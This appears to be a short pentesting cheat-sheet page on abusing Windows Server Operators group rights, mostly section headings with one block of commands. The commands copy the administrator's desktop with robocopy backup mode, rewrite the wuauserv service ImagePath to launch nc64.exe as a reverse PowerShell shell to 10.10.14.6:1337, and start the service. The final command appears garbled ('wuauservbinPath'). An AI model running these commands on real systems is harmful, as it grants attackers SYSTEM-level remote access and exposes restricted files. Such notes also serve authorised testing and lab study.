Server Operators
Information
Privileges
Description
Exploitation
Accessing Files
# copy "restricted" data
robocopy /b C:\users\administrator\desktop C:\programdata\tempImagePath
# change ImagePath
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\spool\drivers\color\nc64.exe -e powershell.exe 10.10.14.6 1337" /f
# confirm change
reg query "HKLM\System\CurrentControlSet\services\wuauserv"
# start service
Start-Service wuauservbinPath
Resources
Last updated
